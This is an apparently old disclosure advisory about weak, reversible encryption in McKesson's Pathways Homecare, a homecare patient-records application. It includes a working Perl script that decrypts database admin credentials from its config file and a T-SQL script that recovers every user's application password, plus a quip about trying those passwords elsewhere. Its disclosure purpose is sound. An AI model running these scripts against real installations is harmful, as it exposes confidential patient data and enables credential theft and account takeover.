Weak Encryption Vulnerability in Pathways Homecare

[shoeboy <shoeboy () adequacy org>]

Platforms: Windows 95
           Windows 98
           Windows ME
           Windows 2000

Application: Pathways Homecare 6.5

What's the big deal?  Users with access to certain config files can
retrieve 'sa' or equivalent account password for SQL Server 7.0 (MSDE)
as well as retrieve application passwords for all users of the
application.

The full scoop:

According to the vendor, McKesson's Pathways Homecare is the first
comprehensive client/server application introduced to the homecare market
for advanced information management.

Basically is stores patient information, billing information and medical
records for people who recieve health care in their homes.  Each clinician
has a laptop and all the laptops are periodically synced with a central
database.  Additionally there is a desktop client for administrative
staff.  Both the laptops and the central database server run Microsoft SQL
Server 7.0.

Workstation and laptop users alike get their connection information from a
file named pwhc.ini which contains an encrypted username and password.
For workstations, the file is stored on a central fileserver and the
account is likely to have dbo level permissions on the central database.
For the laptops, this file is stored locally and the account used is
either 'sa' on the local version of SQL or has equivalent permissions.

As you've probably guessed by now, the vendor (on the web at
www.mckesson.com ) decided to be clever and roll their own encryption
algorithm:

First they determine whether the username/password is even or odd
in length.
If odd, they use the following sequence of numbers: 3,8,5,10,7...
If even, the sequence is 7,4,9,6,11...
Then they reverse the username/password and subtract the corresponding
number in the sequence from each byte.

That wasn't the best of explanations, so here's a bit of perl:

#! /usr/bin/perl -w

################################################################################
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini
file
################################################################################

use strict;

open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
while (<PWHC>) {
   chomp;
   if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
   if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
}

################################################################################
# The sad thing is that this isn't the worst part of product.  It's not
# that the vendor is using weak encryption, it's that the quality of
# the encryption is better than most of their code.
################################################################################


sub decrypt {
   my $counter = 0;
   my $key;
   my @cryptstr = split /=/, $_, 2;
   my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
   if(@revstr % 2) {
      $key = 3;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? 5 : -3;
      }
   }
   else {
      $key = 7;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? -3 : 5;
      }
   }
   return pack("c*", (reverse @revstr));
}

__END__


So now anyone who can get access to the config files for Pathways Homecare
can read and modify confidential patient information as well as enjoy sa
priviliges on laptop clients, but they still can't use McKesson's
usability
disaster of a VB client to access that data in a less inconvienent manner
because it's protected by an an additional level of password protection.

Unfortunately the vendor uses the exact same encryption method with
slightly
different key sequences for this additional layer of security.  It's
possible to retrieve the username and password for every user in about 2
seconds.  The T-SQL code to do this follows:

SET NOCOUNT ON
DECLARE @evenkey varchar(15)
DECLARE @oddkey varchar(15)
DECLARE @key varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length tinyint
DECLARE @usrid varchar(30)

DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey = 'CGEIGKIMKOMQOSQ'

WHILE (@@FETCH_STATUS = 0)
BEGIN
SET @position = 1
SET @length = datalength(@cryptstr)
IF ((@length % 2) = 1) SET @key = @oddkey
ELSE SET @key = @evenkey

WHILE (@position <= @length)
BEGIN
   SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
       CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
       + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
   SET @position = @position + 1
END
PRINT @usrID + ' : ' + @cryptstr
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END
DEALLOCATE pwd_cursor
GO


Bang!  Out come the passwords and it's time to see if the user uses the
same password elsewhere.

I contacted the security-alert () mckesson com 2 weeks ago.  I recieved an
immediate response telling me that my message had been forwarded to the
appropriate parties within the Pathways Homecare product group and that
was the last of it.

Anyway, the best way to mitigate the security vulnerabilities disclosed
here is to not use the product.  Failing that, you should use
integrated security to connect to SQL Server (meaning you can't run
Windows 9x/ME on the laptops, but you shouldn't be doing that anyway).

--Shoeboy
Software is like sex, it's better when RMS isn't involved.